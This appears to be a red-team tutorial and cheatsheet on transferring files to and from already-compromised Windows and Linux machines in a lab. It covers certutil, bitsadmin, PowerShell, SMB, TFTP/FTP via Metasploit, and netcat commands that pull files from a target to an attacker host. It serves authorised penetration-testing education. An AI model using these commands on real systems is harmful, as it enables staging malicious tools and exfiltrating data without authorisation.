File transfer in Windows and Linux is a crucial step in post-exploitation scenarios during penetration testing or red teaming. This article provides a complete cheatsheet for file transfer using multiple tools and protocols on both platforms.

Table of Contents

• Lab setup
• File transfer using wget
• File transfer using curl
• File transfer using certutil
• File transfer using bitsadmin
• File transfer using PowerShell
• File transfer using SMB server
• File transfer using SCP
• File transfer using TFTP
• File transfer using FTP
• Different methods to setup the server for file transfer
• File transfer using Netcat
• Conclusion

Lab setup

Here we are going to perform the file transfer assuming we have already compromised the target machine and we have an initial shell access.

Attacker Machine: Kali Linux (192.168.31.141)

Target Machine 1: Windows 10 (192.168.31.219)

Target Machine 2: Ubuntu

Inside the attacker’s machine, we will set up an Updog server. It serves as a replacement for Python’s SimpleHTTPServer. In particular, it proves useful in scenarios where a lightweight, quick-to-deploy HTTP server is required.

To install the server, we will execute the following command:

pip3 install updog

After the installation is complete, we can run the server at port 80 using the following command:

updog -p 80

wget

To begin with, we can use the wget command to transfer the file. wget is a powerful command-line utility used to download files from the web. Importantly, when we perform file transfer using wget in Windows, we must include the -o (-OutFile) flag to properly save the file. Otherwise, it only returns the result as a WebResponseObject. Here is the Windows-specific wget command:

powershell wget http://192.168.31.141/ignite.txt -o ignite.txt
dir
type ignite.txt

curl

Curl acts as a powerful command-line tool that allows us to transfer files across various networking protocols. Use the following command to transfer the file:

curl http://192.168.31.141/ignite.txt -o ignite.txt

certutil

certutil is a command-line utility included with the Windows operating system. It is primarily used for managing certificates and cryptographic elements. To transfer a file using certutil, execute the following command:

certutil -urlcache -f http://192.168.31.141/ignite.txt ignite.txt

The -split option in certutil is used to split large files into smaller segments to perform the file transfer.

certutil -urlcache -split -f http://192.168.31.141/ignite.txt ignite.txt

bitsadmin

Bitsadmin is another command-line utility tailored for handling Background Intelligent Transfer Service (BITS) tasks in Windows. It helps perform various file transfer operations, such as downloading and uploading files. Use the following command for file transfer using Bitsadmin:

bitsadmin /transfer job http://192.168.31.141/ignite.txt C:\Users\raj\Desktop\ignite.txt

It can be seen that the file is successfully transferred after the command is executed.

File transfer using PowerShell

Alternatively, we can perform file transfer using PowerShell by running the command shown below:

powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.31.141/ignite.txt', 'ignite.txt')

File transfer using SMB server

SMB is a network protocol designed to enable shared access to files, ports, and more within a network. To enable SMB file transfer, we will use the impacket-smbserver script inside Kali Linux to share the files. In this setup, we assign the shared directory the name share. Notably, this simplifies long file paths into a single accessible directory. We can either provide the full directory path or use pwd to represent the current working directory.

impacket-smbserver share $(pwd) -smb2support

After the setup is done, we can execute the following command in the Windows machine to copy the files from the share folder.

copy \\192.168.31.141\share\ignite.txt

To copy the file from Windows into our kali linux, we can use the following command:

copy ignite.txt \\192.168.31.141\share\ignite.txt

In order to transfer file from another linux machine like ubuntu, we can connect with the share folder using the smbclient tool and then after login, we can directly upload and download the file using put and get commands respectively.

smbclient -L 192.168.31.141
smbclient "\\\\192.168.31.141\share"
ls
get ignite.txt
put data.txt

File transfer using SCP

SCP (Secure Copy Protocol) is a method for securely transferring files between a local system and a remote server, or between two remote servers. It operates over the SSH (Secure Shell) protocol, which ensures a secure connection over potentially insecure networks. It has the advantage of cross-platform usage such that it is supported by both linux and windows.

To copy the file from Windows to kali, we will be using the following command:

scp ignite.txt kali@192.168.31.141:/tmp

To transfer the file from kali linux to the windows machine, we will use the following command:

scp ignite.txt raj@192.168.31.219:/C:/Temp

File transfer using TFTP

TFTP (Trivial File Transfer Protocol) is a basic and minimalistic protocol for file transfers over a network. It operates over the UDP rather than TCP, this choice helps keep the protocol lightweight but means it does not provide the reliability and error-checking that TCP offers. It works on UDP port 69.

To transfer a file from kali linux to windows machine, we will be using the following command inside the Metasploit framework:

use auxiliary/server/tftp
set srvhost 192.168.31.141
set tftproot /root/raj
run

To download the file, we will run the following command in windows machine:

tftp -i 192.168.31.219 GET ignite.txt
dir

File transfer using FTP

FTP (File Transfer Protocol) is a longstanding and widely utilized protocol for transferring files across a network. It enables users to upload, download, and manage files on a remote server. To enable the FTP service, we are going to use the Metasploit framework. It can be noted that here we are keeping an authentication on the service rather than keeping the anonymous login.

Following will be the commands:

use auxiliary/server/ftp
set srvhost 192.168.31.141
set ftproot /root/raj
set ftpuser raj
set ftppass 123
run

Once the server is started, the file can be downloaded after authenticating into the FTP server.

ftp 192.168.31.141
raj
get ignite.txt
bye
dir

We can also use the python FTP server using the pyftpdlib. It is a library of python which helps us to setup the FTP server on the machine. Here we will be using it to setup a FTP server on the kali machine.

First, we will start with the installation using pip3.

python3 -m venv pyftpdlib-venv
source pyftpdlib-venv/bin/activate
pip3 install pyftpdlib

After the installation is complete, we can start the FTP server using the authentication by the following command:

python3 -m pyftpdlib -w -p 21 -u ignite -P 123

Once the server is started we can authenticate into the FTP server from the windows machine and download the file. To upload the file we will use the put command and to download the file we will use the get command.

ftp 192.168.31.141
get ignite.txt
put C:Users\raj\avni.txt

To setup FTP server for Anonymous login, we will run the same command but without the username and password.

python -m pyftpdlib -w -p 21

Once the server is enabled for Anonymous login, we can perform it and view the files.

ftp 192.168.31.141
ls

Different methods to setup the server for file transfer

To perform the file transfer, we need to set up a server, apart from using Updog.

One way to achieve this is by setting up a server using PHP with the following command:

php -S 0.0.0.0:8081

Alternatively, you can use Python2 by running:

python2 -m SimpleHTTPServer 80

If you’re using Python3, initiate the server with this command:

python3 -m http.server 8000

File transfer using Netcat

Netcat, commonly known as nc, is a multifunctional networking tool designed for reading from and writing to network connections over TCP or UDP. Netcat can facilitate file transfers by establishing a simple client-server setup.

To transfer file in the kali machine from an Ubuntu machine we can use the following command inside kali:

nc -lvp 5555 > file.txt

Now we can run the following command in ubuntu to send the file to the kali machine:

ls
nc 192.168.31.141 5555 < file.txt

Similarly, we can also receive files from a windows machine inside our kali linux. However, it should be noted that we the target windows machine should have the nc.exe binary to make this method work.

Following is the command we need to run on the windows machine:

nc.exe 192.168.31.141 5555 < data.txt

To receive the file in the kali machine, we will run the following command:

nc -lvp 5555 > data.txt
cat data.txt

Conclusion

As we have seen that there are various methods to transfer the file from out machine to target system and vice versa. It depends on one’s choice and circumstances to use the appropriate tool for the file transfer.

Author: Vinayak Chauhan is an InfoSec researcher and Security Consultan-t. Contact here